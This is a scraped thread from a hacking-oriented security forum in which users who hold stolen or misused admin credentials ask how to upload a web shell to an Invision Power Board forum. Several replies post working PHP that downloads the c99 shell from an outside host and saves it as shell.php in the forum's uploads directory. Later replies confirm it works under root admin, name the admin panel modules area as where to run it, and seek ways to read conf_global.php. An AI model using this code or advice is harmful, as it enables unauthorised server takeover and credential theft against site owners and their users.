|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
how to upload shell on invision power board forum? |
|
Posted: Fri Jan 02, 2009 10:45 pm |
|
|
danzic |
Regular user |
|
|
Joined: Jan 03, 2009 |
Posts: 5 |
|
|
|
|
|
|
|
how to upload shell on invision power board forum?
hi,
i have access to the acp (admin control panel) via admin username and password, i've tried to login to cpanel using the same credentials with the off chance that it might work, but no no avail it never worked.
anyone know how to upload a shell via the acp?
i know its possible with vbulletin forums via the add plugin feature, but i have not found a way to do this with invision power board.
if anyone knows how to or anything about this, it would be much appreciated if you informed me.
cheers |
|
|
|
|
|
|
|
|
Posted: Tue Jan 06, 2009 8:39 pm |
|
|
QMX |
Regular user |
|
|
Joined: Jan 06, 2009 |
Posts: 7 |
|
|
|
|
|
|
|
I've seen this posted here:
Code: | $linky="http://www.evilc0der.com/c99.txt";
$saved="/home/path/towhatever/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from); |
I've tried that in IPB 2.3.6 Doesnt work
Also tried everything else here and no luck.
Does anyone know if 2.3.5 is different? Or do you have to execute this command with Root admin (not regular admin). |
|
|
|
|
|
|
|
|
Posted: Tue Jan 06, 2009 10:14 pm |
|
|
QMX |
Regular user |
|
|
Joined: Jan 06, 2009 |
Posts: 7 |
|
|
|
|
|
|
|
Ok, This does work. I tried it in a test IPB Install. BUT.. You must execute it as a root admin or else it wont work.
Code: | $linky="http://www.evilc0der.com/c99.txt";
$saved="/home/path/towhatever/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from); |
So......... does anyone know how to read conf_global.php from the admin panel using basic admin privilege??
[/code] |
|
|
|
|
Posted: Wed Jan 07, 2009 6:09 am |
|
|
waplet |
Active user |
|
|
Joined: Dec 24, 2008 |
Posts: 31 |
|
|
|
|
|
|
|
i tested this shell upload on IPB 2.3.6 and all was good, dont understand what problems you have! |
|
|
|
|
Posted: Wed Jan 07, 2009 6:32 pm |
|
|
QMX |
Regular user |
|
|
Joined: Jan 06, 2009 |
Posts: 7 |
|
|
|
|
|
|
|
The problem is not the IPB version.
There is two different types of Admin users in IPB.
Root admin- (usually UID 1- has complete access to the board/SQL tools)
^---- I don't have this access.
Administrator- (Can access the admin panel, but cant add a shell using the method above or access SQL toolbox)
^--- I do have this access. |
|
|
|
|
|
... |
|
Posted: Wed Jan 21, 2009 6:48 pm |
|
|
sWeeP |
Regular user |
|
|
Joined: Jan 21, 2009 |
Posts: 16 |
Location: Serbia |
|
|
|
|
|
|
can you tell me in which file i save this code? |
|
|
|
|
Posted: Sun Apr 12, 2009 12:04 am |
|
|
r00t3d |
Beginner |
|
|
Joined: Oct 09, 2008 |
Posts: 4 |
|
|
|
|
|
|
|
waplet wrote: | i tested this shell upload on IPB 2.3.6 and all was good, dont understand what problems you have! |
do ya mind explaining a bit,how ya did it?thanks |
|
|
|
|
Posted: Thu Jun 18, 2009 1:03 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
Posted: Thu May 12, 2011 9:06 am |
|
|
pragna |
Beginner |
|
|
Joined: Mar 28, 2011 |
Posts: 4 |
|
|
|
|
|
|
|
QMX wrote: | Ok, This does work. I tried it in a test IPB Install. BUT.. You must execute it as a root admin or else it wont work.
Code: | $linky="http://www.evilc0der.com/c99.txt";
$saved="/home/path/towhatever/forum/uploads/shell.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from); |
So......... does anyone know how to read conf_global.php from the admin panel using basic admin privilege??
[/code] |
Where i must execute this? in the help ? Can i do this without system command?
http://www.waraxe.us/ftopict-5071.html
this doesnt work for me because the system command is disabled |
|
|
|
|
Posted: Thu May 12, 2011 1:14 pm |
|
|
-AO- |
Advanced user |
|
|
Joined: Jul 15, 2008 |
Posts: 205 |
Location: United States |
|
|
|
|
|
|
execute in the modules area of admin panel. the code doesn't use system. |
|
|
|
|
www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|